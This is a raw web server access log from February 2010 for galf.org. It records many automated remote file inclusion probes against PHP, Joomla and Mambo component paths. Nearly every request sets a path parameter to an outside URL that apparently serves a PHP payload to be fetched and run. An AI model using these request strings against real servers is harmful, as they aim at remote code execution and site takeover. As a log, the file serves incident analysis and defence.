85.233.162.101 - - [28/Feb/2010:18:20:32 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:18:20:32 -0800] "GET /?sourcedir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:18:20:32 -0800] "GET /logs/?sourcedir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:18:20:34 -0800] "GET /logs/access_091019.log/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:18:20:48 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:18:22:22 -0800] "GET /logs/access.log%20%20/lostpasswd.php?env[include_prefix]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.233.162.101 - - [28/Feb/2010:18:22:22 -0800] "GET /lostpasswd.php?env[include_prefix]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.233.162.101 - - [28/Feb/2010:18:22:22 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.233.162.101 - - [28/Feb/2010:18:22:22 -0800] "GET /logs/access.log%20%20/lostpasswd.php?env[include_prefix]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.233.162.101 - - [28/Feb/2010:18:22:22 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.233.162.101 - - [28/Feb/2010:18:22:22 -0800] "GET /lostpasswd.php?env[include_prefix]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.233.162.101 - - [28/Feb/2010:18:22:37 -0800] "GET /logs/access_091221.log%20%20/lostpasswd.php?env[include_prefix]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:18:22:37 -0800] "GET /lostpasswd.php?env[include_prefix]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:18:22:37 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:18:22:38 -0800] "GET /logs/access_091221.log%20%20/lostpasswd.php?env[include_prefix]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:18:22:38 -0800] "GET /lostpasswd.php?env[include_prefix]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:18:22:38 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.225.42.178 - - [28/Feb/2010:18:23:39 -0800] "GET /logs/access_091214.log%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
77.225.42.178 - - [28/Feb/2010:18:23:39 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
77.225.42.178 - - [28/Feb/2010:18:23:39 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
209.126.254.139 - - [28/Feb/2010:18:26:27 -0800] "GET /includes/functions_nomoketos_rules.php?phpbb_root_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.139 - - [28/Feb/2010:18:26:27 -0800] "GET /logs/includes/functions_nomoketos_rules.php?phpbb_root_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.139 - - [28/Feb/2010:18:26:27 -0800] "GET /logs/access_100111.log/includes/functions_nomoketos_rules.php?phpbb_root_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.92.23.144 - - [28/Feb/2010:18:26:36 -0800] "GET /logs/access_090921.log/index.php?sayfa=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.139 - - [28/Feb/2010:18:27:01 -0800] "GET /logs/access.log/includes/functions_nomoketos_rules.php?phpbb_root_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:18:27:01 -0800] "GET /logs/access_091019.log/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:18:27:05 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 200 1050 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:18:27:06 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 200 4807 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:18:27:40 -0800] "GET /logs/access_091019.log/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:18:27:42 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 4807 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:18:27:43 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 1050 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:18:29:18 -0800] "GET /logs/access_090817.log/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:18:30:49 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 4807 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:18:30:50 -0800] "GET /logs/access_091019.log/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:18:30:50 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 1050 "-" "Mozilla/5.0" "www.galf.org"
211.43.212.56 - - [28/Feb/2010:18:31:03 -0800] "GET /logs/access.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.43.212.56 - - [28/Feb/2010:18:31:03 -0800] "GET /?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
211.43.212.56 - - [28/Feb/2010:18:31:03 -0800] "GET /logs/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
212.92.23.144 - - [28/Feb/2010:18:31:04 -0800] "GET /logs/access_100222.log/index.php?sayfa=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.92.23.144 - - [28/Feb/2010:18:31:11 -0800] "GET /logs/access_091221.log/index.php?sayfa=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.138.158.46 - - [28/Feb/2010:18:31:33 -0800] "GET /logs/access_090831.log//main.php?sayfa=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.138.158.46 - - [28/Feb/2010:18:31:41 -0800] "GET /logs/access_091116.log//main.php?sayfa=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.43.212.56 - - [28/Feb/2010:18:31:46 -0800] "GET /logs/access_091116.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.43.212.56 - - [28/Feb/2010:18:31:46 -0800] "GET /logs/access_091130.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.43.212.56 - - [28/Feb/2010:18:32:16 -0800] "GET /logs/access_100201.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.43.212.56 - - [28/Feb/2010:18:32:17 -0800] "GET /logs/access_091214.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.43.212.56 - - [28/Feb/2010:18:32:23 -0800] "GET /logs/access_100104.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.43.212.56 - - [28/Feb/2010:18:32:23 -0800] "GET /logs/access_090928.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.43.212.56 - - [28/Feb/2010:18:32:23 -0800] "GET /logs/access_100222.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.43.212.56 - - [28/Feb/2010:18:32:56 -0800] "GET /logs/access_091123.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.218.116.165 - - [28/Feb/2010:18:39:59 -0800] "GET /logs/access_091214.log HTTP/1.1" 200 1769472 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:18:41:39 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://dongja.booktobi.com//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:18:41:39 -0800] "GET //bbs/write_update.php?board_skin_path=http://dongja.booktobi.com//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:18:42:16 -0800] "GET /logs/access.log%20%20///bbs/write_update.php?board_skin_path=http://dongja.booktobi.com//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Feb/2010:18:42:17 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://dongja.booktobi.com//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Feb/2010:18:42:21 -0800] "GET //bbs/write_update.php?board_skin_path=http://dongja.booktobi.com//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Feb/2010:18:42:26 -0800] "GET /logs/access_100222.log%20%20///bbs/write_update.php?board_skin_path=http://dongja.booktobi.com//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:18:44:15 -0800] "GET /logs/access_100215.log%20%20///bbs/write_update.php?board_skin_path=http://dongja.booktobi.com//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.139 - - [28/Feb/2010:18:44:42 -0800] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.139 - - [28/Feb/2010:18:44:42 -0800] "GET /logs/access_090720.log/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.139 - - [28/Feb/2010:18:44:42 -0800] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.139 - - [28/Feb/2010:18:44:48 -0800] "GET /logs/access_090928.log/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.92.23.144 - - [28/Feb/2010:18:45:49 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.92.23.144 - - [28/Feb/2010:18:45:49 -0800] "GET /logs/access_091221.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:18:46:10 -0800] "GET /logs/access_091123.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:18:46:10 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:18:46:10 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:18:47:08 -0800] "GET /logs/access.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:18:47:08 -0800] "GET /?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:18:47:08 -0800] "GET /logs/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:18:47:48 -0800] "GET /logs/access_091116.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.129.166.221 - - [28/Feb/2010:18:48:19 -0800] "GET /delete.php?board_skin_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
118.129.166.221 - - [28/Feb/2010:18:48:25 -0800] "GET /logs//delete.php?board_skin_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
118.129.166.221 - - [28/Feb/2010:18:48:25 -0800] "GET /logs/access.log//delete.php?board_skin_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
121.254.172.27 - - [28/Feb/2010:18:48:33 -0800] "GET /logs/access_100104.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:18:48:40 -0800] "GET /logs/access_091221.log//modules/My_eGallery/public/displayCategory.php?basepath=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [28/Feb/2010:18:48:40 -0800] "GET //write_update.php?board_skin_path=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [28/Feb/2010:18:48:40 -0800] "GET /logs///write_update.php?board_skin_path=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [28/Feb/2010:18:48:40 -0800] "GET /logs/access.log%20%20///write_update.php?board_skin_path=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:18:48:41 -0800] "GET /logs/access_100201.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:18:48:49 -0800] "GET /logs/access_090817.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:18:48:52 -0800] "GET /logs/access_090831.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:18:49:01 -0800] "GET /logs//becommunity/community/index.php?pageurl=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:18:49:02 -0800] "GET /becommunity/community/index.php?pageurl=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:18:49:02 -0800] "GET /logs/access_091102.log%20%20//becommunity/community/index.php?pageurl=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:18:49:02 -0800] "GET /logs//becommunity/community/index.php?pageurl=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:18:49:07 -0800] "GET /logs/access_090921.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:18:49:13 -0800] "GET /logs/access_100104.log//modules/My_eGallery/public/displayCategory.php?basepath=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.92.23.144 - - [28/Feb/2010:18:49:14 -0800] "GET /logs/access_090720.log//admin.a6mambocredits.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.92.23.144 - - [28/Feb/2010:18:49:14 -0800] "GET /logs/access_090727.log//admin.a6mambocredits.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [28/Feb/2010:18:49:38 -0800] "GET //write_update.php?board_skin_path=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [28/Feb/2010:18:49:38 -0800] "GET /logs///write_update.php?board_skin_path=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [28/Feb/2010:18:49:38 -0800] "GET /logs/access.log///write_update.php?board_skin_path=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:18:49:41 -0800] "GET //bbs/write_update.php?board_skin_path=http://dongja.booktobi.com//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:18:49:42 -0800] "GET /logs/access_100222.log%20%20///bbs/write_update.php?board_skin_path=http://dongja.booktobi.com//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:18:49:42 -0800] "GET /logs/access.log%20%20///bbs/write_update.php?board_skin_path=http://dongja.booktobi.com//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Feb/2010:18:49:44 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://dongja.booktobi.com//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:18:49:45 -0800] "GET //bbs/write_update.php?board_skin_path=http://dongja.booktobi.com//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Feb/2010:18:49:50 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://dongja.booktobi.com//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
84.40.30.37 - - [28/Feb/2010:18:50:23 -0800] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.30.37 - - [28/Feb/2010:18:50:23 -0800] "GET /logs/access_100118.log%20%20/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.30.37 - - [28/Feb/2010:18:50:23 -0800] "GET /logs/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.30.37 - - [28/Feb/2010:18:50:23 -0800] "GET /logs/access_100111.log%20%20/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.30.37 - - [28/Feb/2010:18:50:26 -0800] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.30.37 - - [28/Feb/2010:18:50:26 -0800] "GET /logs/access_100111.log%20%20/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:18:51:19 -0800] "GET /logs/access_100215.log%20%20///bbs/write_update.php?board_skin_path=http://dongja.booktobi.com//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.30.37 - - [28/Feb/2010:18:51:20 -0800] "GET /logs/access_100118.log/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.30.37 - - [28/Feb/2010:18:51:20 -0800] "GET /logs/access_100111.log/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.30.37 - - [28/Feb/2010:18:51:23 -0800] "GET /logs/access_100118.log/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.30.37 - - [28/Feb/2010:18:51:23 -0800] "GET /logs/access_100111.log/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [28/Feb/2010:18:52:10 -0800] "GET /logs/access_100201.log///write_update.php?board_skin_path=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [28/Feb/2010:18:53:56 -0800] "GET /logs/access_100201.log%20%20///write_update.php?board_skin_path=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [28/Feb/2010:18:54:24 -0800] "GET /bbs//////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [28/Feb/2010:18:54:24 -0800] "GET /logs/access_100201.log%20%20//bbs//////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [28/Feb/2010:18:54:24 -0800] "GET /logs//bbs//////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:18:58:47 -0800] "GET /logs/access_091102.log//becommunity/community/index.php?pageurl=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:18:58:58 -0800] "GET /logs/access_091102.log//becommunity/community/index.php?pageurl=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.136.23.172 - - [28/Feb/2010:18:59:48 -0800] "GET /admin/auth.php?xcart_dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.136.23.172 - - [28/Feb/2010:18:59:48 -0800] "GET /logs/access_100118.log%20%20//admin/auth.php?xcart_dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.136.23.172 - - [28/Feb/2010:18:59:48 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.136.23.172 - - [28/Feb/2010:18:59:49 -0800] "GET /admin/auth.php?xcart_dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.136.23.172 - - [28/Feb/2010:18:59:49 -0800] "GET /logs/access_100118.log//admin/auth.php?xcart_dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.136.23.172 - - [28/Feb/2010:18:59:49 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.136.23.172 - - [28/Feb/2010:18:59:56 -0800] "GET /logs/access_100111.log//admin/auth.php?xcart_dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.136.23.172 - - [28/Feb/2010:18:59:57 -0800] "GET /admin/auth.php?xcart_dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.136.23.172 - - [28/Feb/2010:18:59:57 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
